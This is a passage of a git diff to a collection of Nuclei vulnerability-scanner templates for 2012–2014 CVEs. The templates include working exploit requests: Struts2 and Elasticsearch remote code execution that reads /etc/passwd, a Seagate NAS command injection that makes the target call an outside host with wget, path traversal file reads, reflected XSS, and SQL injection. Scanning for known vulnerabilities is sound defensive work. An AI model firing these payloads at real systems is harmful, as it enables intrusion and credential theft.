'{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-4889.yaml b/nuclei-templates/CVE-2012/CVE-2012-4889.yaml similarity index 100% rename from nuclei-templates/CVE-2012/cve-2012-4889.yaml rename to nuclei-templates/CVE-2012/CVE-2012-4889.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-0392.yaml b/nuclei-templates/CVE-2012/cve-2012-0392.yaml new file mode 100644 index 0000000000..40e158645e --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-0392.yaml @@ -0,0 +1,34 @@ +id: CVE-2012-0392 + +info: + name: Apache Struts2 S2-008 RCE + author: pikpikcu + severity: critical + description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. + reference: + - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 + - http://www.exploit-db.com/exploits/18329 + - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html + - http://secunia.com/advisories/47393 + remediation: Developers should immediately upgrade to at least Struts 2.3.18. + classification: + cve-id: CVE-2012-0392 + tags: cve,cve2012,apache,rce,struts,java + +requests: + - method: GET + path: + - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-0896.yaml b/nuclei-templates/CVE-2012/cve-2012-0896.yaml new file mode 100644 index 0000000000..bda61c73ec --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-0896.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-0896 + +info: + name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access + author: daffainfo + severity: high + description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + reference: + - https://packetstormsecurity.com/files/108631/ + - https://www.cvedetails.com/cve/CVE-2012-0896 + - http://secunia.com/advisories/47529 + - http://plugins.trac.wordpress.org/changeset/488883/count-per-day + classification: + cve-id: CVE-2012-0896 + tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0901.yaml b/nuclei-templates/CVE-2012/cve-2012-0901.yaml similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-0901.yaml rename to nuclei-templates/CVE-2012/cve-2012-0901.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-1835.yaml b/nuclei-templates/CVE-2012/cve-2012-1835.yaml new file mode 100644 index 0000000000..754535a598 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-1835.yaml @@ -0,0 +1,42 @@ +id: CVE-2012-1835 + +info: + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + - http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html + - http://www.securityfocus.com/bid/52986 + - https://www.htbridge.com/advisory/HTB23082 + classification: + cve-id: CVE-2012-1835 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-4253.yaml b/nuclei-templates/CVE-2012/cve-2012-4253.yaml new file mode 100644 index 0000000000..e9211386c2 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-4253.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-4253 + +info: + name: MySQLDumper 1.24.4 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. + reference: + - https://www.exploit-db.com/exploits/37129 + - https://www.cvedetails.com/cve/CVE-2012-4253 + - http://www.osvdb.org/81609 + - http://www.osvdb.org/81615 + classification: + cve-id: CVE-2012-4253 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4273.yaml b/nuclei-templates/CVE-2012/cve-2012-4273.yaml similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-4273.yaml rename to nuclei-templates/CVE-2012/cve-2012-4273.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-4547.yaml b/nuclei-templates/CVE-2012/cve-2012-4547.yaml new file mode 100644 index 0000000000..4a35ca2a5e --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-4547.yaml @@ -0,0 +1,40 @@ +id: CVE-2012-4547 + +info: + name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + reference: + - https://www.exploit-db.com/exploits/36164 + - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 + - http://awstats.sourceforge.net/docs/awstats_changelog.txt + - http://openwall.com/lists/oss-security/2012/10/29/7 + classification: + cve-id: CVE-2012-4547 + tags: cve,cve2020,xss,awstats + +requests: + - method: GET + path: + - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/cve-2013-2251.yaml b/nuclei-templates/CVE-2013/CVE-2013-2251.yaml similarity index 100% rename from nuclei-templates/CVE-2013/cve-2013-2251.yaml rename to nuclei-templates/CVE-2013/CVE-2013-2251.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml b/nuclei-templates/CVE-2013/CVE-2013-2287.yaml deleted file mode 100644 index 53312074c8..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2013-2287 - -info: - name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 - - https://www.dognaedis.com/vulns/DGS-SEC-16.html - - http://osvdb.org/90840 - classification: - cve-id: CVE-2013-2287 - tags: cve,cve2013,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/CVE-2013-3526.yaml b/nuclei-templates/CVE-2013/CVE-2013-3526.yaml deleted file mode 100644 index aca8c27951..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-3526.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2013-3526 - -info: - name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/ - classification: - cve-id: CVE-2013-3526 - tags: cve,cve2013,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2013/CVE-2013-6281.yaml b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml new file mode 100644 index 0000000000..d08cfdb755 --- /dev/null +++ b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml @@ -0,0 +1,41 @@ +id: CVE-2013-6281 +info: + name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS + author: random-robbie + severity: medium + description: | + The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability. + reference: + - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf + - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ + - https://wordpress.org/plugins/dhtmlxspreadsheet/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2013-6281 + cwe-id: CWE-79 + metadata: + google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet + verified: "true" + tags: cve,cve2013,wordpress,xss,wp-plugin,wp +requests: + - raw: + - | + GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: word + part: body + words: + - "page: ''" + - "dhx_rel_path" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2013/cve-2013-7240.yaml b/nuclei-templates/CVE-2013/CVE-2013-7240.yaml similarity index 100% rename from nuclei-templates/CVE-2013/cve-2013-7240.yaml rename to nuclei-templates/CVE-2013/CVE-2013-7240.yaml diff --git a/nuclei-templates/CVE-2013/cve-2013-2287.yaml b/nuclei-templates/CVE-2013/cve-2013-2287.yaml new file mode 100644 index 0000000000..5d169d1e53 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-2287.yaml @@ -0,0 +1,37 @@ +id: CVE-2013-2287 + +info: + name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + - http://osvdb.org/90840 + - https://www.dognaedis.com/vulns/DGS-SEC-16.html + classification: + cve-id: CVE-2013-2287 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/cve-2013-3526.yaml b/nuclei-templates/CVE-2013/cve-2013-3526.yaml new file mode 100644 index 0000000000..2f271d0f3b --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-3526.yaml @@ -0,0 +1,38 @@ +id: CVE-2013-3526 + +info: + name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html + - http://osvdb.org/92197 + - http://www.securityfocus.com/bid/58948 + classification: + cve-id: CVE-2013-3526 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2013/cve-2013-6281.yaml b/nuclei-templates/CVE-2013/cve-2013-6281.yaml deleted file mode 100644 index 2f67a808c3..0000000000 --- a/nuclei-templates/CVE-2013/cve-2013-6281.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2013-6281 - -info: - name: WordPress Spreadsheet - Cross-Site Scripting - author: random-robbie - severity: medium - description: | - WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. - reference: - - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - - https://wordpress.org/plugins/dhtmlxspreadsheet/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2013-6281 - cwe-id: CWE-79 - metadata: - google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet - verified: "true" - tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin - -requests: - - raw: - - | - GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "page: ''" - - "dhx_rel_path" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml b/nuclei-templates/CVE-2014/CVE-2014-1203.yaml deleted file mode 100644 index 744b0ec237..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2014-1203 -info: - name: Eyou E-Mail <3.6 - Remote Code Execution - author: pikpikcu - severity: critical - description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. - reference: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 - - http://seclists.org/fulldisclosure/2014/Jan/32 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-1203 - cwe-id: CWE-77 - tags: rce,eyou -requests: - - raw: - - | - POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - type='|cat /etc/passwd||' - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2321.yaml b/nuclei-templates/CVE-2014/CVE-2014-2321.yaml new file mode 100644 index 0000000000..c26212d1b8 --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-2321.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-2321 + +info: + name: ZTE Cable Modem Web Shell + description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + author: geeknik + reference: + - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ + - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ + severity: high + tags: iot,cve,cve2014,zte + +requests: + - method: GET + path: + - "{{BaseURL}}/web_shell_cmd.gch" + + matchers-condition: and + matchers: + - type: word + words: + - "please input shell command" + - "ZTE Corporation. All rights reserved" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2323.yaml b/nuclei-templates/CVE-2014/CVE-2014-2323.yaml deleted file mode 100644 index c06086a11a..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-2323.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2014-2323 - -info: - name: Lighttpd 1.4.34 SQL Injection and Path Traversal - description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 - - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt - - http://www.lighttpd.net/2014/3/12/1.4.35/ - author: geeknik - severity: critical - tags: cve,cve2014,sqli,lighttpd,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2014-2323 - cwe-id: CWE-89 - -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: [::1]' UNION SELECT '/ - - unsafe: true - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml b/nuclei-templates/CVE-2014/CVE-2014-2383.yaml deleted file mode 100644 index 910a491834..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2014-2383 -info: - name: Arbitrary file read in dompdf < v0.6.0 - author: 0x_Akoko - severity: high - description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 - - https://www.exploit-db.com/exploits/33004 - - http://seclists.org/fulldisclosure/2014/Apr/258 - - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ - classification: - cve-id: CVE-2014-2383 - metadata: - unix-payload: /dompdf.php?input_file=/etc/passwd - win-payload: /dompdf.php?input_file=C:/windows/win.ini - tags: cve,cve2014,dompdf,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/dompdf.php?input_file=dompdf.php" - - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" - - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" - - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "application/pdf" - - 'filename="dompdf_out.pdf"' - part: header - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2962.yaml b/nuclei-templates/CVE-2014/CVE-2014-2962.yaml deleted file mode 100644 index f7845d4250..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-2962.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2014-2962 - -info: - name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal - author: daffainfo - severity: high - description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. - reference: - - https://www.kb.cert.org/vuls/id/774788 - - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l - tags: cve,cve2014,lfi,router,firmware,traversal - classification: - cve-id: CVE-2014-2962 - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3120.yaml b/nuclei-templates/CVE-2014/CVE-2014-3120.yaml deleted file mode 100644 index c78a900373..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-3120.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2014-3120 -info: - name: ElasticSearch v1.1.1/1.2 RCE - author: pikpikcu - severity: critical - description: | - The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. - reference: - - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - - https://www.elastic.co/blog/logstash-1-4-3-released - - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - - http://bouk.co/blog/elasticsearch-rce/ - classification: - cve-id: CVE-2014-3120 - tags: cve,cve2014,elastic,rce,elasticsearch -requests: - - raw: - - | - POST /_search?pretty HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: application/x-www-form-urlencoded - - { - "size": 1, - "query": { - "filtered": { - "query": { - "match_all": { - } - } - } - }, - "script_fields": { - "command": { - "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" - } - } - } - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3206.yaml b/nuclei-templates/CVE-2014/CVE-2014-3206.yaml deleted file mode 100644 index 64af96912b..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-3206.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2014-3206 - -info: - name: Seagate BlackArmor NAS - Command Injection - author: gy741 - severity: critical - description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - - https://www.exploit-db.com/exploits/33159 - - https://www.exploit-db.com/exploits/33159/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-3206 - cwe-id: CWE-20 - tags: cve,cve2014,seagate,rce,edb - -requests: - - raw: - - | - GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - unsafe: true - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-3704.yaml b/nuclei-templates/CVE-2014/CVE-2014-3704.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-3704.yaml rename to nuclei-templates/CVE-2014/CVE-2014-3704.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4210.yaml b/nuclei-templates/CVE-2014/CVE-2014-4210.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4210.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4210.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4535.yaml b/nuclei-templates/CVE-2014/CVE-2014-4535.yaml deleted file mode 100644 index af16cacede..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-4535.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2014-4535 - -info: - name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting - author: daffainfo - severity: medium - reference: - - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - tags: cve,cve2014,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-4535 - cwe-id: CWE-79 - description: "A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "'>" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-4539.yaml b/nuclei-templates/CVE-2014/CVE-2014-4539.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4539.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4539.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4544.yaml b/nuclei-templates/CVE-2014/CVE-2014-4544.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4544.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4544.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4550.yaml b/nuclei-templates/CVE-2014/CVE-2014-4550.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4550.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4550.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4592.yaml b/nuclei-templates/CVE-2014/CVE-2014-4592.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4592.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4592.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4940.yaml b/nuclei-templates/CVE-2014/CVE-2014-4940.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4940.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4940.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4942.yaml b/nuclei-templates/CVE-2014/CVE-2014-4942.yaml new file mode 100644 index 0000000000..3bfce6456b --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-4942.yaml @@ -0,0 +1,34 @@ +id: CVE-2014-4942 +info: + name: WP EasyCart - Information Disclosure + author: 